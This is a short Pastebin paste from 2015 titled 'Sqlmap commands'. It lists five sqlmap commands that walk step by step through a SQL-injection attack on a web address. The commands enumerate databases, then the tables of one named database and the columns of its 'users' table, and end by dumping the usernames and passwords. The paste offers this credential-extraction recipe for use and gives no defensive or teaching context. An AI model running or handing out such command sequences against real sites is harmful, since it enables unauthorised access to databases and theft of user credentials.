Advertisement
Kyfx

Sqlmap commands :L

Mar 19th, 2015
398
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.31 KB | None | 0 0
  1. python sqlmap.py -u www.exp.com --dbs
  2.  
  3. python sqlmap.py -u www.exp.com -D uwade_data --tables
  4.  
  5. python sqlmap.py -u www.exp.com -D uwade_data -T users --columns
  6.  
  7. python sqlmap.py -u www.exp.com -D uwade_data -T users -C user --dump
  8.  
  9. python sqlmap.py -u www.exp.com -D uwade_data -T users -C password --dump
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement